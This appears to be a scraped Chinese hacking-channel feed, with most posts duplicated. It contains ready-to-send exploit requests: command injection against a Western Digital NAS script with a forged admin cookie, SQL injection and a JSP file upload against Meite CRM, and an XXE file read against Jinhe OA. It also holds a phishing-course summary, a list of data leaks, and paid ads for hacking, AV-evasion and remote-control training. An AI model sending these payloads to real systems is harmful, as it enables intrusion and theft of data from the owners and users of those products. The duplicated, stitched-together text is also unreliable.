西部数据 NAS chk_vv_sharename.php 远程命令执行漏洞
GET /web/php/chk_vv_sharename.php?vv_sharename=";id;" HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15
Connection: keep-alive
Cookie: isAdmin=1; username=admin;
Accept-Encoding: gzip, deflate, br
GET /web/php/chk_vv_sharename.php?vv_sharename=";id;" HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15
Connection: keep-alive
Cookie: isAdmin=1; username=admin;
Accept-Encoding: gzip, deflate, br
美特CRM mcc_login.jsp SQL注入漏洞
POST /si/callcenter/solarun/mcc_login.jsp HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (SS; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0
Connection: close
Content-Length: 42
Content-Type: application/x-www-form-urlencoded ; application/x-www-form-urlencoded
Expires: 0
Pragma: no-cache
Accept-Encoding: gzip
workerid=1'&passwd=abc123def&rtype=call400
POST /si/callcenter/solarun/mcc_login.jsp HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (SS; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0
Connection: close
Content-Length: 42
Content-Type: application/x-www-form-urlencoded ; application/x-www-form-urlencoded
Expires: 0
Pragma: no-cache
Accept-Encoding: gzip
workerid=1'&passwd=abc123def&rtype=call400
编号: CVE-2025-5419
访问地址: https://github.com/itsShotgun/chrome_cve-2025-5419...
描述: Checks if your Chrome version is vulnerable to CVE-2025-5419, from the browser
[注意:新的CVE仓库,请自行分辨是否为红队钓鱼]
访问地址: https://github.com/itsShotgun/chrome_cve-2025-5419...
描述: Checks if your Chrome version is vulnerable to CVE-2025-5419, from the browser
[注意:新的CVE仓库,请自行分辨是否为红队钓鱼]
课程主题:《公开课:社会工程之使用钓鱼盗取任意账号密码》
课程内容:
介绍了钓鱼攻击,这是一种通过社会工程手段欺骗人们泄露个人信息和凭证的攻击方法。攻击者会创建看似合法的网站或通信,诱骗用户输入敏感信息。钓鱼攻击针对的是人的心理弱点,而非技术漏洞,因此即使是最安全的系统也可能被攻破。
为了演示钓鱼攻击的过程,1使用Kali Linux操作系统和SE工具包创建了一个克隆网站。
2并通过URL屏蔽技术使其看起来更合法。
3攻击者还会使用紧迫感或兴奋感的术语来操纵情绪,以增加欺骗性。
如何防范:
为了保护自己和信息安全,1建议用户在输入凭证前验证URL,2使用双因素身份验证,保持系统和浏览器更新,并安装反钓鱼保护软件。此外,要警惕未经请求的通信,询问个人信息,并学会识别钓鱼的迹象。
声明:
最后,强调知识和责任的重要性,提醒观众用所学知识保护自己,永远不要造成伤害。
课程内容:
介绍了钓鱼攻击,这是一种通过社会工程手段欺骗人们泄露个人信息和凭证的攻击方法。攻击者会创建看似合法的网站或通信,诱骗用户输入敏感信息。钓鱼攻击针对的是人的心理弱点,而非技术漏洞,因此即使是最安全的系统也可能被攻破。
为了演示钓鱼攻击的过程,1使用Kali Linux操作系统和SE工具包创建了一个克隆网站。
2并通过URL屏蔽技术使其看起来更合法。
3攻击者还会使用紧迫感或兴奋感的术语来操纵情绪,以增加欺骗性。
如何防范:
为了保护自己和信息安全,1建议用户在输入凭证前验证URL,2使用双因素身份验证,保持系统和浏览器更新,并安装反钓鱼保护软件。此外,要警惕未经请求的通信,询问个人信息,并学会识别钓鱼的迹象。
声明:
最后,强调知识和责任的重要性,提醒观众用所学知识保护自己,永远不要造成伤害。
课程主题:《公开课:社会工程之使用钓鱼盗取任意账号密码》
通过网盘分享的文件:安全·公开课
链接: https://pan.baidu.com/s/1ES9qiYfCBaIqQjKJLYkD2w 提取码: y22c
--来自百度网盘超级会员v4的分享
通过网盘分享的文件:安全·公开课
链接: https://pan.baidu.com/s/1ES9qiYfCBaIqQjKJLYkD2w 提取码: y22c
--来自百度网盘超级会员v4的分享
Baidu
百度网盘 请输入提取码
百度网盘为您提供文件的网络备份、同步和分享服务。空间大、速度快、安全稳固,支持教育网加速,支持手机端。注册使用百度网盘即可享受免费存储空间
金和OA /servlet/ActionDataSet存在XXE漏洞
POST /jc6/servlet/ActionDataSet HTTP/1.1
Host:
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=D4849851A1A6578CDE4C441FA16BE524
Connection: close
Content-Length: 125
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]> <root>&xxe;</root>
POST /jc6/servlet/ActionDataSet HTTP/1.1
Host:
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=D4849851A1A6578CDE4C441FA16BE524
Connection: close
Content-Length: 125
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]> <root>&xxe;</root>
美特CRM upload.jsp 文件上传
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host:
Content-Length: 768
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0Mh3BfgWszxRFokh
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Referer: http://0.0.0.0/develop/systparam/softlogo/file2.js...
Connection: close
------WebKitFormBoundary0Mh3BfgWszxRFokh
Content-Disposition: form-data; name="file"; filename="klms.jsp"
Content-Type: text/plain
<% out.print("HelloWorldTest");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
------WebKitFormBoundary0Mh3BfgWszxRFokh
Content-Disposition: form-data; name="key"
null
------WebKitFormBoundary0Mh3BfgWszxRFokh
Content-Disposition: form-data; name="form"
null
------WebKitFormBoundary0Mh3BfgWszxRFokh
Content-Disposition: form-data; name="field"
null
------WebKitFormBoundary0Mh3BfgWszxRFokh
Content-Disposition: form-data; name="filetitile"
null
------WebKitFormBoundary0Mh3BfgWszxRFokh
Content-Disposition: form-data; name="filefolder"
null
------WebKitFormBoundary0Mh3BfgWszxRFokh--
上传路径
GET /userfile/default/userlogo/{{filename}}.jsp HTTP/1.1
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host:
Content-Length: 768
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0Mh3BfgWszxRFokh
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Referer: http://0.0.0.0/develop/systparam/softlogo/file2.js...
Connection: close
------WebKitFormBoundary0Mh3BfgWszxRFokh
Content-Disposition: form-data; name="file"; filename="klms.jsp"
Content-Type: text/plain
<% out.print("HelloWorldTest");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
------WebKitFormBoundary0Mh3BfgWszxRFokh
Content-Disposition: form-data; name="key"
null
------WebKitFormBoundary0Mh3BfgWszxRFokh
Content-Disposition: form-data; name="form"
null
------WebKitFormBoundary0Mh3BfgWszxRFokh
Content-Disposition: form-data; name="field"
null
------WebKitFormBoundary0Mh3BfgWszxRFokh
Content-Disposition: form-data; name="filetitile"
null
------WebKitFormBoundary0Mh3BfgWszxRFokh
Content-Disposition: form-data; name="filefolder"
null
------WebKitFormBoundary0Mh3BfgWszxRFokh--
上传路径
GET /userfile/default/userlogo/{{filename}}.jsp HTTP/1.1
近年数据泄露事件总结
你需要知道的近年来重要的数据泄露事件,为什么有人能够通过外网社交平台也能够定位某些人
我们处于一个数据的时代,历年来泄露的数据为黑客和其它组织提供了一个强大的工具,而你需要了解这些信息的来源。
2018年QQ用户数据泄露事件暴露了8亿条QQ用户信息,主要涉及QQ用户的手机绑定信息。
2019年11月起,某学生对淘宝实施了长达八个月的数据爬取并盗走大量用户数据。在阿里巴巴注意到这一问题前,已经有超过11亿8千多万条用户信息泄露。
2020年3月4日,5.38亿条微博用户信息泄露,其中1.72 亿有账号基本信息,含绑定手机号数据。
2020年11月,平安人寿六盘水中心支公司内部人员利用职务之便泄露客户信息,涉案的公民信息高达4万余条。
2020年11月23日,有用户在黑客论坛放出了一个44.65GB社工库信息包,该库就包含了此前所泄露的大约5.38亿微博用户数据、8亿条QQ用户数据、75万条车主信息、某保险公司10万条数据、70万条企业数据、部分快递信息和某贷视频照片。这些信息被众多的人广泛获取。
2021年12月,中国初创公司Socialarks(笨鸟社交)泄露了400GB数据,由于ElasticSearch数据库设置错误,泄露了超过3.18亿条用户记录,涉及到Instagram、领英、Facebook等多个社交平台的用户信息。
2022年3月,超过2亿条国内个人信息在国外暗网论坛兜售,可能来自微博、QQ等多个社交媒体,包括姓名、手机号、邮箱、密码等信息。
2022年9月,某地方公安局的一个数据库被黑客入侵,这批泄露自公安局的数据由总计逾23TB的多个部分构成,涉及逾十亿中国大陆居民,包含姓名、地址、出生地、身份证号码、照片、手机号码和刑事案件资讯。
2023年2月,约45亿条中国快递地址库内个人信息被泄露,包括姓名、地址、手机号等信息。
如下是部分外网社交媒体重要的泄露事件,显然也会被利用来关联中国用户的信息。
2019年12月,一个黑客组织获取了超过3亿个Facebook账号的数据,包括姓名、电话号码、Facebook ID等信息,这些数据被发现在一个未加密的数据库中。
2021年4月,Facebook的一项数据泄露事件影响了超过5.3亿用户,包括姓名、电话号码、生日、电子邮件地址等信息,这些数据被发现在暗网论坛上免费提供。
2020年5月,Telegram的一个数据库被发现在暗网论坛上出售,包含了约7000万个用户的电话号码和Telegram唯一用户ID,这些数据可能来自于2019年的一次数据泄露事件,当时黑客利用了Telegram的联系人导入功能,获取了用户的信息。
2020年6月,Telegram遭到又一次数据泄露事件,未知的黑客在暗网论坛上公开了其用户的个人信息,包括电话号码、Telegram唯一用户ID和其他敏感信息,据称影响了约4000万用户。
2022年7月,Twitter确认了一次数据泄露事件,是由一个已经修复的零日漏洞导致的,该漏洞允许黑客将电子邮件地址和电话号码与用户账号关联,从而编制了一个包含540万个用户账号信息的列表。
2023年1月,一个自称StayMad的黑客声称泄露了超过2亿推特个用户的个人数据,包括一些高调的账号,如谷歌CEO Sundar Pichai, Donald Trump Jr., SpaceX, CBS Media, NBA, WHO等,这些数据包括姓名、电话号码、电子邮件地址、密码等信息。
显然我们正处于一个数据“大繁荣”的时代,泄密事件从来没有停止过。这也告诉我们在互联网上没有谁可以保证信息是安全的。
#新闻
你需要知道的近年来重要的数据泄露事件,为什么有人能够通过外网社交平台也能够定位某些人
我们处于一个数据的时代,历年来泄露的数据为黑客和其它组织提供了一个强大的工具,而你需要了解这些信息的来源。
2018年QQ用户数据泄露事件暴露了8亿条QQ用户信息,主要涉及QQ用户的手机绑定信息。
2019年11月起,某学生对淘宝实施了长达八个月的数据爬取并盗走大量用户数据。在阿里巴巴注意到这一问题前,已经有超过11亿8千多万条用户信息泄露。
2020年3月4日,5.38亿条微博用户信息泄露,其中1.72 亿有账号基本信息,含绑定手机号数据。
2020年11月,平安人寿六盘水中心支公司内部人员利用职务之便泄露客户信息,涉案的公民信息高达4万余条。
2020年11月23日,有用户在黑客论坛放出了一个44.65GB社工库信息包,该库就包含了此前所泄露的大约5.38亿微博用户数据、8亿条QQ用户数据、75万条车主信息、某保险公司10万条数据、70万条企业数据、部分快递信息和某贷视频照片。这些信息被众多的人广泛获取。
2021年12月,中国初创公司Socialarks(笨鸟社交)泄露了400GB数据,由于ElasticSearch数据库设置错误,泄露了超过3.18亿条用户记录,涉及到Instagram、领英、Facebook等多个社交平台的用户信息。
2022年3月,超过2亿条国内个人信息在国外暗网论坛兜售,可能来自微博、QQ等多个社交媒体,包括姓名、手机号、邮箱、密码等信息。
2022年9月,某地方公安局的一个数据库被黑客入侵,这批泄露自公安局的数据由总计逾23TB的多个部分构成,涉及逾十亿中国大陆居民,包含姓名、地址、出生地、身份证号码、照片、手机号码和刑事案件资讯。
2023年2月,约45亿条中国快递地址库内个人信息被泄露,包括姓名、地址、手机号等信息。
如下是部分外网社交媒体重要的泄露事件,显然也会被利用来关联中国用户的信息。
2019年12月,一个黑客组织获取了超过3亿个Facebook账号的数据,包括姓名、电话号码、Facebook ID等信息,这些数据被发现在一个未加密的数据库中。
2021年4月,Facebook的一项数据泄露事件影响了超过5.3亿用户,包括姓名、电话号码、生日、电子邮件地址等信息,这些数据被发现在暗网论坛上免费提供。
2020年5月,Telegram的一个数据库被发现在暗网论坛上出售,包含了约7000万个用户的电话号码和Telegram唯一用户ID,这些数据可能来自于2019年的一次数据泄露事件,当时黑客利用了Telegram的联系人导入功能,获取了用户的信息。
2020年6月,Telegram遭到又一次数据泄露事件,未知的黑客在暗网论坛上公开了其用户的个人信息,包括电话号码、Telegram唯一用户ID和其他敏感信息,据称影响了约4000万用户。
2022年7月,Twitter确认了一次数据泄露事件,是由一个已经修复的零日漏洞导致的,该漏洞允许黑客将电子邮件地址和电话号码与用户账号关联,从而编制了一个包含540万个用户账号信息的列表。
2023年1月,一个自称StayMad的黑客声称泄露了超过2亿推特个用户的个人数据,包括一些高调的账号,如谷歌CEO Sundar Pichai, Donald Trump Jr., SpaceX, CBS Media, NBA, WHO等,这些数据包括姓名、电话号码、电子邮件地址、密码等信息。
显然我们正处于一个数据“大繁荣”的时代,泄密事件从来没有停止过。这也告诉我们在互联网上没有谁可以保证信息是安全的。
#新闻
🥰🥰🥰🥰🥰🥰🥰🥰
web渗透|黑客教程|逆向工程|kaliLinux渗透|远控免杀:
🥰再次介绍一下会员制度
1.VIP1基础资料会员:原价499先活动399内容包含(各种独家技术学习资料,4000+本电子书,终身免费更新,学习路线规划,任务布置,任务答疑,自律强的同学首选)
🥰2.VIP2普通辅导会员原价700活动599(问题一对一辅导,定期开展公开课,技术瓶颈助突破,免费更新各种工具,逆向工程享受八折优惠,拉人组队再反200)
🥰3.VIP3私教终身会员原价2999活动1999内容包含(终身私教指导机会,项目合作机会,承诺教所学的一切技术保证毫无保留,一对一辅导,项目合作涉及渗透演练,逆向工程等)
由于最近资料质量提供工具会员群上涨十元,还会再涨想观望朋友们抓紧时间了,早加入早享受👍👍
有一些兄弟问我有什么资历教你们,我ict三等奖,信息安全与管理一等奖,国赛备赛中,教一些脚本小子,小白完全可以,大佬让行🤝🤝
✈️✈️✈️✈️✈️✈️✈️✈️
web渗透|黑客教程|逆向工程|kaliLinux渗透|远控免杀:
🥰再次介绍一下会员制度
1.VIP1基础资料会员:原价499先活动399内容包含(各种独家技术学习资料,4000+本电子书,终身免费更新,学习路线规划,任务布置,任务答疑,自律强的同学首选)
🥰2.VIP2普通辅导会员原价700活动599(问题一对一辅导,定期开展公开课,技术瓶颈助突破,免费更新各种工具,逆向工程享受八折优惠,拉人组队再反200)
🥰3.VIP3私教终身会员原价2999活动1999内容包含(终身私教指导机会,项目合作机会,承诺教所学的一切技术保证毫无保留,一对一辅导,项目合作涉及渗透演练,逆向工程等)
由于最近资料质量提供工具会员群上涨十元,还会再涨想观望朋友们抓紧时间了,早加入早享受👍👍
有一些兄弟问我有什么资历教你们,我ict三等奖,信息安全与管理一等奖,国赛备赛中,教一些脚本小子,小白完全可以,大佬让行🤝🤝
✈️✈️✈️✈️✈️✈️✈️✈️